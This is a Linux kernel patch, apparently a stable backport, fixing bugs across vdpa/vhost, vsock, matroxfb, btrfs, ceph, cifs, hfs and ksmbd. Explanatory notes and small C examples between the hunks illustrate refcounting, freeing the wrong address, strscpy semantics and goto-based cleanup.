+index b071f0d842fba..cb88891b44a8c 100644
+--- a/drivers/vdpa/vdpa_sim/vdpa_sim.c
++++ b/drivers/vdpa/vdpa_sim/vdpa_sim.c
+@@ -67,8 +67,7 @@ static void vdpasim_queue_ready(struct vdpasim *vdpasim, unsigned int idx)
+ {
+ 	struct vdpasim_virtqueue *vq = &vdpasim->vqs[idx];
+ 
+-	vringh_init_iotlb(&vq->vring, vdpasim->dev_attr.supported_features,
+-			  VDPASIM_QUEUE_MAX, false,
++	vringh_init_iotlb(&vq->vring, vdpasim->features, vq->num, false,
+ 			  (struct vring_desc *)(uintptr_t)vq->desc_addr,
+ 			  (struct vring_avail *)
+ 			  (uintptr_t)vq->driver_addr,
+@@ -690,7 +689,9 @@ static void vdpasim_free(struct vdpa_device *vdpa)
+ 	}
+ 
+ 	kvfree(vdpasim->buffer);
+-	vhost_iotlb_free(vdpasim->iommu);
++	for (i = 0; i < vdpasim->dev_attr.nas; i++)
++		vhost_iotlb_reset(&vdpasim->iommu[i]);
++	kfree(vdpasim->iommu);
+ 	kfree(vdpasim->vqs);
+ 	kfree(vdpasim->config);
+ }
+diff --git a/drivers/vdpa/vdpa_sim/vdpa_sim_blk.c b/drivers/vdpa/vdpa_sim/vdpa_sim_blk.c
+index c6db1a1baf768..f745926237a88 100644
+--- a/drivers/vdpa/vdpa_sim/vdpa_sim_blk.c
++++ b/drivers/vdpa/vdpa_sim/vdpa_sim_blk.c
+@@ -427,8 +427,10 @@ static int __init vdpasim_blk_init(void)
+ 	int ret;
+ 
+ 	ret = device_register(&vdpasim_blk_mgmtdev);
+-	if (ret)
++	if (ret) {
++		put_device(&vdpasim_blk_mgmtdev);
+ 		return ret;
++	}
+ 
+ 	ret = vdpa_mgmtdev_register(&mgmt_dev);
+ 	if (ret)
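
The vdpasim hunk above (and the matching vdpa_sim_net.c change below) fixes the device_register() error path: once device_register() has been called, the embedded struct device is refcounted even on failure, so the caller must drop the reference with put_device() instead of just returning and leaking it. A toy userspace model of that contract; all names here are illustrative:

#include <stdio.h>
#include <stdlib.h>

struct toy_device { int refs; };

static void toy_put(struct toy_device *d)
{
	if (--d->refs == 0) {
		printf("final put: released\n");
		free(d);
	}
}

static int toy_register(struct toy_device *d)
{
	d->refs = 1;	/* registration takes the initial reference */
	return -22;	/* simulate -EINVAL from the core */
}

int main(void)
{
	struct toy_device *d = calloc(1, sizeof(*d));

	if (toy_register(d)) {
		toy_put(d);	/* the fix: drop the reference, don't leak */
		return 1;
	}
	toy_put(d);
	return 0;
}
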
+diff --git a/drivers/vdpa/vdpa_sim/vdpa_sim_net.c b/drivers/vdpa/vdpa_sim/vdpa_sim_net.c
+index c3cb225ea4693..11f5a121df243 100644
+--- a/drivers/vdpa/vdpa_sim/vdpa_sim_net.c
++++ b/drivers/vdpa/vdpa_sim/vdpa_sim_net.c
+@@ -305,8 +305,10 @@ static int __init vdpasim_net_init(void)
+ 	int ret;
+ 
+ 	ret = device_register(&vdpasim_net_mgmtdev);
+-	if (ret)
++	if (ret) {
++		put_device(&vdpasim_net_mgmtdev);
+ 		return ret;
++	}
+ 
+ 	ret = vdpa_mgmtdev_register(&mgmt_dev);
+ 	if (ret)
+diff --git a/drivers/vdpa/virtio_pci/vp_vdpa.c b/drivers/vdpa/virtio_pci/vp_vdpa.c
+index d448db0c4de3f..8fe267ca3e76f 100644
+--- a/drivers/vdpa/virtio_pci/vp_vdpa.c
++++ b/drivers/vdpa/virtio_pci/vp_vdpa.c
+@@ -647,7 +647,7 @@ static void vp_vdpa_remove(struct pci_dev *pdev)
+ 	mdev = vp_vdpa_mgtdev->mdev;
+ 	vp_modern_remove(mdev);
+ 	vdpa_mgmtdev_unregister(&vp_vdpa_mgtdev->mgtdev);
+-	kfree(&vp_vdpa_mgtdev->mgtdev.id_table);
++	kfree(vp_vdpa_mgtdev->mgtdev.id_table);
+ 	kfree(mdev);
+ 	kfree(vp_vdpa_mgtdev);
+ }
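
The vp_vdpa hunk above removes a stray `&`: kfree(&vp_vdpa_mgtdev->mgtdev.id_table) passed the address of the pointer member itself, not the allocation it points to. A userspace sketch of the same bug class with free():

#include <stdlib.h>

struct mgtdev {
	int *id_table;	/* heap allocation owned by the struct */
};

int main(void)
{
	struct mgtdev m;

	m.id_table = malloc(4 * sizeof(*m.id_table));

	/* free(&m.id_table) would hand the allocator the address of the
	 * pointer *field* inside m — memory that was never allocated —
	 * and corrupt the heap. The fixed form frees the allocation: */
	free(m.id_table);
	return 0;
}
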
+diff --git a/drivers/vhost/vdpa.c b/drivers/vhost/vdpa.c
+index 166044642fd5c..ec32f785dfdec 100644
+--- a/drivers/vhost/vdpa.c
++++ b/drivers/vhost/vdpa.c
+@@ -65,6 +65,10 @@ static DEFINE_IDA(vhost_vdpa_ida);
+ 
+ static dev_t vhost_vdpa_major;
+ 
++static void vhost_vdpa_iotlb_unmap(struct vhost_vdpa *v,
++				   struct vhost_iotlb *iotlb, u64 start,
++				   u64 last, u32 asid);
++
+ static inline u32 iotlb_to_asid(struct vhost_iotlb *iotlb)
+ {
+ 	struct vhost_vdpa_as *as = container_of(iotlb, struct
+@@ -135,7 +139,7 @@ static int vhost_vdpa_remove_as(struct vhost_vdpa *v, u32 asid)
+ 		return -EINVAL;
+ 
+ 	hlist_del(&as->hash_link);
+-	vhost_iotlb_reset(&as->iotlb);
++	vhost_vdpa_iotlb_unmap(v, &as->iotlb, 0ULL, 0ULL - 1, asid);
+ 	kfree(as);
+ 
+ 	return 0;
+@@ -683,10 +687,20 @@ static long vhost_vdpa_unlocked_ioctl(struct file *filep,
+ 	mutex_unlock(&d->mutex);
+ 	return r;
+ }
++static void vhost_vdpa_general_unmap(struct vhost_vdpa *v,
++				     struct vhost_iotlb_map *map, u32 asid)
++{
++	struct vdpa_device *vdpa = v->vdpa;
++	const struct vdpa_config_ops *ops = vdpa->config;
++	if (ops->dma_map) {
++		ops->dma_unmap(vdpa, asid, map->start, map->size);
++	} else if (ops->set_map == NULL) {
++		iommu_unmap(v->domain, map->start, map->size);
++	}
++}
+ 
+-static void vhost_vdpa_pa_unmap(struct vhost_vdpa *v,
+-				struct vhost_iotlb *iotlb,
+-				u64 start, u64 last)
++static void vhost_vdpa_pa_unmap(struct vhost_vdpa *v, struct vhost_iotlb *iotlb,
++				u64 start, u64 last, u32 asid)
+ {
+ 	struct vhost_dev *dev = &v->vdev;
+ 	struct vhost_iotlb_map *map;
+@@ -703,13 +717,13 @@ static void vhost_vdpa_pa_unmap(struct vhost_vdpa *v,
+ 			unpin_user_page(page);
+ 		}
+ 		atomic64_sub(PFN_DOWN(map->size), &dev->mm->pinned_vm);
++		vhost_vdpa_general_unmap(v, map, asid);
+ 		vhost_iotlb_map_free(iotlb, map);
+ 	}
+ }
+ 
+-static void vhost_vdpa_va_unmap(struct vhost_vdpa *v,
+-				struct vhost_iotlb *iotlb,
+-				u64 start, u64 last)
++static void vhost_vdpa_va_unmap(struct vhost_vdpa *v, struct vhost_iotlb *iotlb,
++				u64 start, u64 last, u32 asid)
+ {
+ 	struct vhost_iotlb_map *map;
+ 	struct vdpa_map_file *map_file;
+@@ -718,20 +732,21 @@ static void vhost_vdpa_va_unmap(struct vhost_vdpa *v,
+ 		map_file = (struct vdpa_map_file *)map->opaque;
+ 		fput(map_file->file);
+ 		kfree(map_file);
++		vhost_vdpa_general_unmap(v, map, asid);
+ 		vhost_iotlb_map_free(iotlb, map);
+ 	}
+ }
+ 
+ static void vhost_vdpa_iotlb_unmap(struct vhost_vdpa *v,
+-				   struct vhost_iotlb *iotlb,
+-				   u64 start, u64 last)
++				   struct vhost_iotlb *iotlb, u64 start,
++				   u64 last, u32 asid)
+ {
+ 	struct vdpa_device *vdpa = v->vdpa;
+ 
+ 	if (vdpa->use_va)
+-		return vhost_vdpa_va_unmap(v, iotlb, start, last);
++		return vhost_vdpa_va_unmap(v, iotlb, start, last, asid);
+ 
+-	return vhost_vdpa_pa_unmap(v, iotlb, start, last);
++	return vhost_vdpa_pa_unmap(v, iotlb, start, last, asid);
+ }
+ 
+ static int perm_to_iommu_flags(u32 perm)
+@@ -798,17 +813,12 @@ static void vhost_vdpa_unmap(struct vhost_vdpa *v,
+ 	const struct vdpa_config_ops *ops = vdpa->config;
+ 	u32 asid = iotlb_to_asid(iotlb);
+ 
+-	vhost_vdpa_iotlb_unmap(v, iotlb, iova, iova + size - 1);
++	vhost_vdpa_iotlb_unmap(v, iotlb, iova, iova + size - 1, asid);
+ 
+-	if (ops->dma_map) {
+-		ops->dma_unmap(vdpa, asid, iova, size);
+-	} else if (ops->set_map) {
++	if (ops->set_map) {
+ 		if (!v->in_batch)
+ 			ops->set_map(vdpa, asid, iotlb);
+-	} else {
+-		iommu_unmap(v->domain, iova, size);
+ 	}
+-
+ 	/* If we are in the middle of batch processing, delay the free
+ 	 * of AS until BATCH_END.
+ 	 */
+@@ -1162,14 +1172,14 @@ static void vhost_vdpa_cleanup(struct vhost_vdpa *v)
+ 	struct vhost_vdpa_as *as;
+ 	u32 asid;
+ 
+-	vhost_dev_cleanup(&v->vdev);
+-	kfree(v->vdev.vqs);
+-
+ 	for (asid = 0; asid < v->vdpa->nas; asid++) {
+ 		as = asid_to_as(v, asid);
+ 		if (as)
+ 			vhost_vdpa_remove_as(v, asid);
+ 	}
++
++	vhost_dev_cleanup(&v->vdev);
++	kfree(v->vdev.vqs);
+ }
+ 
+ static int vhost_vdpa_open(struct inode *inode, struct file *filep)
+diff --git a/drivers/vhost/vhost.c b/drivers/vhost/vhost.c
+index 40097826cff0b..3c2359570df9d 100644
+--- a/drivers/vhost/vhost.c
++++ b/drivers/vhost/vhost.c
+@@ -2053,7 +2053,7 @@ static int translate_desc(struct vhost_virtqueue *vq, u64 addr, u32 len,
+ 	struct vhost_dev *dev = vq->dev;
+ 	struct vhost_iotlb *umem = dev->iotlb ? dev->iotlb : dev->umem;
+ 	struct iovec *_iov;
+-	u64 s = 0;
++	u64 s = 0, last = addr + len - 1;
+ 	int ret = 0;
+ 
+ 	while ((u64)len > s) {
+@@ -2063,7 +2063,7 @@ static int translate_desc(struct vhost_virtqueue *vq, u64 addr, u32 len,
+ 			break;
+ 		}
+ 
+-		map = vhost_iotlb_itree_first(umem, addr, addr + len - 1);
++		map = vhost_iotlb_itree_first(umem, addr, last);
+ 		if (map == NULL || map->start > addr) {
+ 			if (umem != dev->iotlb) {
+ 				ret = -EFAULT;
+diff --git a/drivers/vhost/vringh.c b/drivers/vhost/vringh.c
+index 11f59dd06a74e..828c293065657 100644
+--- a/drivers/vhost/vringh.c
++++ b/drivers/vhost/vringh.c
+@@ -1102,7 +1102,7 @@ static int iotlb_translate(const struct vringh *vrh,
+ 	struct vhost_iotlb_map *map;
+ 	struct vhost_iotlb *iotlb = vrh->iotlb;
+ 	int ret = 0;
+-	u64 s = 0;
++	u64 s = 0, last = addr + len - 1;
+ 
+ 	spin_lock(vrh->iotlb_lock);
+ 
+@@ -1114,8 +1114,7 @@ static int iotlb_translate(const struct vringh *vrh,
+ 			break;
+ 		}
+ 
+-		map = vhost_iotlb_itree_first(iotlb, addr,
+-					      addr + len - 1);
++		map = vhost_iotlb_itree_first(iotlb, addr, last);
+ 		if (!map || map->start > addr) {
+ 			ret = -EINVAL;
+ 			break;
+diff --git a/drivers/vhost/vsock.c b/drivers/vhost/vsock.c
+index 5703775af1297..10a7d23731fef 100644
+--- a/drivers/vhost/vsock.c
++++ b/drivers/vhost/vsock.c
+@@ -959,7 +959,14 @@ static int __init vhost_vsock_init(void)
+ 				  VSOCK_TRANSPORT_F_H2G);
+ 	if (ret < 0)
+ 		return ret;
+-	return misc_register(&vhost_vsock_misc);
++
++	ret = misc_register(&vhost_vsock_misc);
++	if (ret) {
++		vsock_core_unregister(&vhost_transport.transport);
++		return ret;
++	}
++
++	return 0;
+ };
+ 
+ static void __exit vhost_vsock_exit(void)
+diff --git a/drivers/video/fbdev/matrox/matroxfb_base.c b/drivers/video/fbdev/matrox/matroxfb_base.c
+index 775d34115e2df..82f53e998b018 100644
+--- a/drivers/video/fbdev/matrox/matroxfb_base.c
++++ b/drivers/video/fbdev/matrox/matroxfb_base.c
+@@ -1378,8 +1378,8 @@ static struct video_board vbG200 = {
+ 	.lowlevel = &matrox_G100
+ };
+ static struct video_board vbG200eW = {
+-	.maxvram = 0x100000,
+-	.maxdisplayable = 0x800000,
++	.maxvram = 0x1000000,
++	.maxdisplayable = 0x0800000,
+ 	.accelID = FB_ACCEL_MATROX_MGAG200,
+ 	.lowlevel = &matrox_G100
+ };
+diff --git a/fs/btrfs/disk-io.c b/fs/btrfs/disk-io.c
+index d99bf7c646110..6538f52262ca4 100644
+--- a/fs/btrfs/disk-io.c
++++ b/fs/btrfs/disk-io.c
+@@ -3296,6 +3296,8 @@ out:
+ /*
+  * Do various sanity and dependency checks of different features.
+  *
++ * @is_rw_mount:	Whether the mount is read-write.
++ *
+  * This is the place for less strict checks (like for subpage or artificial
+  * feature dependencies).
+  *
+@@ -3306,7 +3308,7 @@ out:
+  * (space cache related) can modify on-disk format like free space tree and
+  * screw up certain feature dependencies.
+  */
+-int btrfs_check_features(struct btrfs_fs_info *fs_info, struct super_block *sb)
++int btrfs_check_features(struct btrfs_fs_info *fs_info, bool is_rw_mount)
+ {
+ 	struct btrfs_super_block *disk_super = fs_info->super_copy;
+ 	u64 incompat = btrfs_super_incompat_flags(disk_super);
+@@ -3345,7 +3347,7 @@ int btrfs_check_features(struct btrfs_fs_info *fs_info, struct super_block *sb)
+ 	if (btrfs_super_nodesize(disk_super) > PAGE_SIZE)
+ 		incompat |= BTRFS_FEATURE_INCOMPAT_BIG_METADATA;
+ 
+-	if (compat_ro_unsupp && !sb_rdonly(sb)) {
++	if (compat_ro_unsupp && is_rw_mount) {
+ 		btrfs_err(fs_info,
+ 	"cannot mount read-write because of unknown compat_ro features (0x%llx)",
+ 		       compat_ro);
+@@ -3548,7 +3550,7 @@ int __cold open_ctree(struct super_block *sb, struct btrfs_fs_devices *fs_device
+ 		goto fail_alloc;
+ 	}
+ 
+-	ret = btrfs_check_features(fs_info, sb);
++	ret = btrfs_check_features(fs_info, !sb_rdonly(sb));
+ 	if (ret < 0) {
+ 		err = ret;
+ 		goto fail_alloc;
+diff --git a/fs/btrfs/disk-io.h b/fs/btrfs/disk-io.h
+index 9fa923e005a3a..7322af63c0cc7 100644
+--- a/fs/btrfs/disk-io.h
++++ b/fs/btrfs/disk-io.h
+@@ -50,7 +50,7 @@ int __cold open_ctree(struct super_block *sb,
+ void __cold close_ctree(struct btrfs_fs_info *fs_info);
+ int btrfs_validate_super(struct btrfs_fs_info *fs_info,
+ 			 struct btrfs_super_block *sb, int mirror_num);
+-int btrfs_check_features(struct btrfs_fs_info *fs_info, struct super_block *sb);
++int btrfs_check_features(struct btrfs_fs_info *fs_info, bool is_rw_mount);
+ int write_all_supers(struct btrfs_fs_info *fs_info, int max_mirrors);
+ struct btrfs_super_block *btrfs_read_dev_super(struct block_device *bdev);
+ struct btrfs_super_block *btrfs_read_dev_one_super(struct block_device *bdev,
+diff --git a/fs/btrfs/extent-io-tree.c b/fs/btrfs/extent-io-tree.c
+index 7b93719a486c5..09ae0e73e6805 100644
+--- a/fs/btrfs/extent-io-tree.c
++++ b/fs/btrfs/extent-io-tree.c
+@@ -1507,7 +1507,7 @@ u64 count_range_bits(struct extent_io_tree *tree,
+ 	u64 last = 0;
+ 	int found = 0;
+ 
+-	if (WARN_ON(search_end <= cur_start))
++	if (WARN_ON(search_end < cur_start))
+ 		return 0;
+ 
+ 	spin_lock(&tree->lock);
+diff --git a/fs/btrfs/extent_io.c b/fs/btrfs/extent_io.c
+index 4dcf22e051ff8..acb3c5c3b0251 100644
+--- a/fs/btrfs/extent_io.c
++++ b/fs/btrfs/extent_io.c
+@@ -580,7 +580,16 @@ static int repair_io_failure(struct btrfs_fs_info *fs_info, u64 ino, u64 start,
+ 				      &map_length, &bioc, mirror_num);
+ 		if (ret)
+ 			goto out_counter_dec;
+-		BUG_ON(mirror_num != bioc->mirror_num);
++		/*
++		 * This happens when dev-replace is also running, and the
++		 * mirror_num indicates the dev-replace target.
++		 *
++		 * In this case, we don't need to do anything, as the read
++		 * error just means the replace progress hasn't reached our
++		 * read range, and the replace routine will handle it later.
++		 */
++		if (mirror_num != bioc->mirror_num)
++			goto out_counter_dec;
+ 	}
+ 
+ 	sector = bioc->stripes[bioc->mirror_num - 1].physical >> 9;
+diff --git a/fs/btrfs/file.c b/fs/btrfs/file.c
+index ed4e1c3705d0a..9bef8eaa074a0 100644
+--- a/fs/btrfs/file.c
++++ b/fs/btrfs/file.c
+@@ -3671,7 +3671,7 @@ bool btrfs_find_delalloc_in_range(struct btrfs_inode *inode, u64 start, u64 end,
+ 	u64 prev_delalloc_end = 0;
+ 	bool ret = false;
+ 
+-	while (cur_offset < end) {
++	while (cur_offset <= end) {
+ 		u64 delalloc_start;
+ 		u64 delalloc_end;
+ 		bool delalloc;
+diff --git a/fs/btrfs/ioctl.c b/fs/btrfs/ioctl.c
+index 5ba2e810dc6e0..fd1902573cde3 100644
+--- a/fs/btrfs/ioctl.c
++++ b/fs/btrfs/ioctl.c
+@@ -3750,13 +3750,10 @@ static long btrfs_ioctl_dev_info(struct btrfs_fs_info *fs_info,
+ 	di_args->bytes_used = btrfs_device_get_bytes_used(dev);
+ 	di_args->total_bytes = btrfs_device_get_total_bytes(dev);
+ 	memcpy(di_args->uuid, dev->uuid, sizeof(di_args->uuid));
+-	if (dev->name) {
+-		strncpy(di_args->path, rcu_str_deref(dev->name),
+-				sizeof(di_args->path) - 1);
+-		di_args->path[sizeof(di_args->path) - 1] = 0;
+-	} else {
++	if (dev->name)
++		strscpy(di_args->path, rcu_str_deref(dev->name), sizeof(di_args->path));
++	else
+ 		di_args->path[0] = '\0';
+-	}
+ 
+ out:
+ 	rcu_read_unlock();
+diff --git a/fs/btrfs/rcu-string.h b/fs/btrfs/rcu-string.h
+index 5c1a617eb25de..5c2b66d155ef7 100644
+--- a/fs/btrfs/rcu-string.h
++++ b/fs/btrfs/rcu-string.h
+@@ -18,7 +18,11 @@ static inline struct rcu_string *rcu_string_strdup(const char *src, gfp_t mask)
+ 					 (len * sizeof(char)), mask);
+ 	if (!ret)
+ 		return ret;
+-	strncpy(ret->str, src, len);
++	/* Warn if the source got unexpectedly truncated. */
++	if (WARN_ON(strscpy(ret->str, src, len) < 0)) {
++		kfree(ret);
++		return NULL;
++	}
+ 	return ret;
+ }
+ 
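
The two btrfs hunks above move from strncpy() to strscpy(), which copies at most size - 1 bytes, always NUL-terminates, and returns -E2BIG when the source had to be truncated — which is what the new WARN_ON() in rcu_string_strdup() keys off. A simplified userspace model of those semantics (strscpy_model() is a sketch, not the kernel's optimized implementation):

#include <stdio.h>
#include <string.h>

/* Simplified model of the kernel's strscpy(): always NUL-terminates
 * and returns the copied length, or -E2BIG (here -7) on truncation. */
static long strscpy_model(char *dst, const char *src, size_t size)
{
	size_t len;

	if (size == 0)
		return -7;
	len = strnlen(src, size);
	if (len == size) {		/* source does not fit */
		memcpy(dst, src, size - 1);
		dst[size - 1] = '\0';
		return -7;
	}
	memcpy(dst, src, len + 1);	/* includes the NUL */
	return (long)len;
}

int main(void)
{
	char path[8];
	long ret = strscpy_model(path, "/dev/sda1", sizeof(path));

	printf("%ld \"%s\"\n", ret, path);	/* -7 "/dev/sd" */
	return 0;
}
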
+diff --git a/fs/btrfs/super.c b/fs/btrfs/super.c
+index 5942b93840884..abfd7c897075a 100644
+--- a/fs/btrfs/super.c
++++ b/fs/btrfs/super.c
+@@ -2014,7 +2014,7 @@ static int btrfs_remount(struct super_block *sb, int *flags, char *data)
+ 	if (ret)
+ 		goto restore;
+ 
+-	ret = btrfs_check_features(fs_info, sb);
++	ret = btrfs_check_features(fs_info, !(*flags & SB_RDONLY));
+ 	if (ret < 0)
+ 		goto restore;
+ 
+diff --git a/fs/btrfs/tree-defrag.c b/fs/btrfs/tree-defrag.c
+index b6cf39f4e7e48..072ab9a1374b5 100644
+--- a/fs/btrfs/tree-defrag.c
++++ b/fs/btrfs/tree-defrag.c
+@@ -31,8 +31,10 @@ int btrfs_defrag_leaves(struct btrfs_trans_handle *trans,
+ 		goto out;
+ 
+ 	path = btrfs_alloc_path();
+-	if (!path)
+-		return -ENOMEM;
++	if (!path) {
++		ret = -ENOMEM;
++		goto out;
++	}
+ 
+ 	level = btrfs_header_level(root->node);
+ 
+diff --git a/fs/ceph/caps.c b/fs/ceph/caps.c
+index e54814d0c2f7b..cd69bf267d1b1 100644
+--- a/fs/ceph/caps.c
++++ b/fs/ceph/caps.c
+@@ -2915,7 +2915,7 @@ int ceph_get_caps(struct file *filp, int need, int want, loff_t endoff, int *got
+ 
+ 	while (true) {
+ 		flags &= CEPH_FILE_MODE_MASK;
+-		if (atomic_read(&fi->num_locks))
++		if (vfs_inode_has_locks(inode))
+ 			flags |= CHECK_FILELOCK;
+ 		_got = 0;
+ 		ret = try_get_cap_refs(inode, need, want, endoff,
+diff --git a/fs/ceph/locks.c b/fs/ceph/locks.c
+index 3e2843e86e274..b191426bf880c 100644
+--- a/fs/ceph/locks.c
++++ b/fs/ceph/locks.c
+@@ -32,18 +32,14 @@ void __init ceph_flock_init(void)
+ 
+ static void ceph_fl_copy_lock(struct file_lock *dst, struct file_lock *src)
+ {
+-	struct ceph_file_info *fi = dst->fl_file->private_data;
+ 	struct inode *inode = file_inode(dst->fl_file);
+ 	atomic_inc(&ceph_inode(inode)->i_filelock_ref);
+-	atomic_inc(&fi->num_locks);
+ }
+ 
+ static void ceph_fl_release_lock(struct file_lock *fl)
+ {
+-	struct ceph_file_info *fi = fl->fl_file->private_data;
+ 	struct inode *inode = file_inode(fl->fl_file);
+ 	struct ceph_inode_info *ci = ceph_inode(inode);
+-	atomic_dec(&fi->num_locks);
+ 	if (atomic_dec_and_test(&ci->i_filelock_ref)) {
+ 		/* clear error when all locks are released */
+ 		spin_lock(&ci->i_ceph_lock);
+diff --git a/fs/ceph/super.h b/fs/ceph/super.h
+index 40630e6f691c7..ae4126f634101 100644
+--- a/fs/ceph/super.h
++++ b/fs/ceph/super.h
+@@ -788,7 +788,6 @@ struct ceph_file_info {
+ 	struct list_head rw_contexts;
+ 
+ 	u32 filp_gen;
+-	atomic_t num_locks;
+ };
+ 
+ struct ceph_dir_file_info {
+diff --git a/fs/cifs/sess.c b/fs/cifs/sess.c
+index 9e7d9f0baa18a..0b842a07e1579 100644
+--- a/fs/cifs/sess.c
++++ b/fs/cifs/sess.c
+@@ -292,9 +292,10 @@ cifs_chan_update_iface(struct cifs_ses *ses, struct TCP_Server_Info *server)
+ 			continue;
+ 		}
+ 		kref_get(&iface->refcount);
++		break;
+ 	}
+ 
+-	if (!list_entry_is_head(iface, &ses->iface_list, iface_head)) {
++	if (list_entry_is_head(iface, &ses->iface_list, iface_head)) {
+ 		rc = 1;
+ 		iface = NULL;
+ 		cifs_dbg(FYI, "unable to find a suitable iface\n");
+diff --git a/fs/cifs/smb2ops.c b/fs/cifs/smb2ops.c
+index b24e68b5ccd61..8da98918cf86b 100644
+--- a/fs/cifs/smb2ops.c
++++ b/fs/cifs/smb2ops.c
+@@ -530,7 +530,6 @@ parse_server_interfaces(struct network_interface_info_ioctl_rsp *buf,
+ 	p = buf;
+ 
+ 	spin_lock(&ses->iface_lock);
+-	ses->iface_count = 0;
+ 	/*
+ 	 * Go through iface_list and do kref_put to remove
+ 	 * any unused ifaces. ifaces in use will be removed
+@@ -540,6 +539,7 @@ parse_server_interfaces(struct network_interface_info_ioctl_rsp *buf,
+ 				 iface_head) {
+ 		iface->is_active = 0;
+ 		kref_put(&iface->refcount, release_iface);
++		ses->iface_count--;
+ 	}
+ 	spin_unlock(&ses->iface_lock);
+ 
+@@ -618,6 +618,7 @@ parse_server_interfaces(struct network_interface_info_ioctl_rsp *buf,
+ 				/* just get a ref so that it doesn't get picked/freed */
+ 				iface->is_active = 1;
+ 				kref_get(&iface->refcount);
++				ses->iface_count++;
+ 				spin_unlock(&ses->iface_lock);
+ 				goto next_iface;
+ 			} else if (ret < 0) {
+diff --git a/fs/hfs/inode.c b/fs/hfs/inode.c
+index a0746be3c1de7..80d17c520d0ba 100644
+--- a/fs/hfs/inode.c
++++ b/fs/hfs/inode.c
+@@ -458,15 +458,16 @@ int hfs_write_inode(struct inode *inode, struct writeback_control *wbc)
+ 		/* panic? */
+ 		return -EIO;
+ 
++	res = -EIO;
+ 	if (HFS_I(main_inode)->cat_key.CName.len > HFS_NAMELEN)
+-		return -EIO;
++		goto out;
+ 	fd.search_key->cat = HFS_I(main_inode)->cat_key;
+ 	if (hfs_brec_find(&fd))
+-		/* panic? */
+ 		goto out;
+ 
+ 	if (S_ISDIR(main_inode->i_mode)) {
+-		WARN_ON(fd.entrylength < sizeof(struct hfs_cat_dir));
++		if (fd.entrylength < sizeof(struct hfs_cat_dir))
++			goto out;
+ 		hfs_bnode_read(fd.bnode, &rec, fd.entryoffset,
+ 			   sizeof(struct hfs_cat_dir));
+ 		if (rec.type != HFS_CDR_DIR ||
+@@ -479,6 +480,8 @@ int hfs_write_inode(struct inode *inode, struct writeback_control *wbc)
+ 		hfs_bnode_write(fd.bnode, &rec, fd.entryoffset,
+ 			    sizeof(struct hfs_cat_dir));
+ 	} else if (HFS_IS_RSRC(inode)) {
++		if (fd.entrylength < sizeof(struct hfs_cat_file))
++			goto out;
+ 		hfs_bnode_read(fd.bnode, &rec, fd.entryoffset,
+ 			       sizeof(struct hfs_cat_file));
+ 		hfs_inode_write_fork(inode, rec.file.RExtRec,
+@@ -486,7 +489,8 @@ int hfs_write_inode(struct inode *inode, struct writeback_control *wbc)
+ 		hfs_bnode_write(fd.bnode, &rec, fd.entryoffset,
+ 				sizeof(struct hfs_cat_file));
+ 	} else {
+-		WARN_ON(fd.entrylength < sizeof(struct hfs_cat_file));
++		if (fd.entrylength < sizeof(struct hfs_cat_file))
++			goto out;
+ 		hfs_bnode_read(fd.bnode, &rec, fd.entryoffset,
+ 			   sizeof(struct hfs_cat_file));
+ 		if (rec.type != HFS_CDR_FIL ||
+@@ -503,9 +507,10 @@ int hfs_write_inode(struct inode *inode, struct writeback_control *wbc)
+ 		hfs_bnode_write(fd.bnode, &rec, fd.entryoffset,
+ 			    sizeof(struct hfs_cat_file));
+ 	}
++	res = 0;
+ out:
+ 	hfs_find_exit(&fd);
+-	return 0;
++	return res;
+ }
+ 
+ static struct dentry *hfs_file_lookup(struct inode *dir, struct dentry *dentry,
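
The hfs_write_inode() hunks above replace WARN_ON() on short catalog records with real error handling: `res` defaults to -EIO, every validation failure jumps to `out`, and hfs_find_exit() always runs. A compact sketch of that goto-based unwind pattern; names are illustrative, not HFS internals:

#include <stdio.h>

static void find_exit(void) { printf("find context released\n"); }

static int write_record(int entrylength)
{
	int res = -5;	/* default to failure (-EIO) */

	if (entrylength < 16)	/* was a WARN_ON(); now a real failure */
		goto out;

	/* ... read/modify/write the catalog record ... */
	res = 0;
out:
	find_exit();	/* cleanup runs on every path */
	return res;
}

int main(void)
{
	return write_record(4) ? 1 : 0;	/* too-short record: fails cleanly */
}
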
+diff --git a/fs/ksmbd/auth.c b/fs/ksmbd/auth.c
+index 2a39ffb8423b7..6e61b5bc7d86e 100644
+--- a/fs/ksmbd/auth.c
++++ b/fs/ksmbd/auth.c
+@@ -322,7 +322,8 @@ int ksmbd_decode_ntlmssp_auth_blob(struct authenticate_message *authblob,
+ 	dn_off = le32_to_cpu(authblob->DomainName.BufferOffset);
+ 	dn_len = le16_to_cpu(authblob->DomainName.Length);
+ 
+-	if (blob_len < (u64)dn_off + dn_len || blob_len < (u64)nt_off + nt_len)
++	if (blob_len < (u64)dn_off + dn_len || blob_len < (u64)nt_off + nt_len ||
++	    nt_len < CIFS_ENCPWD_SIZE)
+ 		return -EINVAL;
+ 
+ 	/* TODO : use domain name that imported from configuration file */
+diff --git a/fs/ksmbd/connection.c b/fs/ksmbd/connection.c
+index 12be8386446a3..fd0a288af299e 100644
+--- a/fs/ksmbd/connection.c
++++ b/fs/ksmbd/connection.c
+@@ -316,9 +316,12 @@ int ksmbd_conn_handler_loop(void *p)
+ 
+ 		/* 4 for rfc1002 length field */
+ 		size = pdu_size + 4;
+-		conn->request_buf = kvmalloc(size, GFP_KERNEL);
++		conn->request_buf = kvmalloc(size,
++					     GFP_KERNEL |
++					     __GFP_NOWARN |
++					     __GFP_NORETRY);
+ 		if (!conn->request_buf)
+-			continue;
++			break;
+ 
+ 		memcpy(conn->request_buf, hdr_buf, sizeof(hdr_buf));
+ 		if (!ksmbd_smb_request(conn))
+diff --git a/fs/ksmbd/smb2pdu.c b/fs/ksmbd/smb2pdu.c
+index b2fc85d440d03..533742ebcb379 100644
+--- a/fs/ksmbd/smb2pdu.c
++++ b/fs/ksmbd/smb2pdu.c
+@@ -1926,13 +1926,13 @@ int smb2_tree_connect(struct ksmbd_work *work)
+ 	if (conn->posix_ext_supported)
+ 		status.tree_conn->posix_extensions = true;
+ 
+-out_err1:
+ 	rsp->StructureSize = cpu_to_le16(16);
++	inc_rfc1001_len(work->response_buf, 16);
++out_err1:
+ 	rsp->Capabilities = 0;
+ 	rsp->Reserved = 0;
+ 	/* default manual caching */
+ 	rsp->ShareFlags = SMB2_SHAREFLAG_MANUAL_CACHING;
+-	inc_rfc1001_len(work->response_buf, 16);
+ 
+ 	if (!IS_ERR(treename))
+ 		kfree(treename);
+@@ -1965,6 +1965,9 @@ out_err1:
+ 		rsp->hdr.Status = STATUS_ACCESS_DENIED;
+ 	}
+ 
++	if (status.ret != KSMBD_TREE_CONN_STATUS_OK)
++		smb2_set_err_rsp(work);
++
+ 	return rc;
+ }
+ 
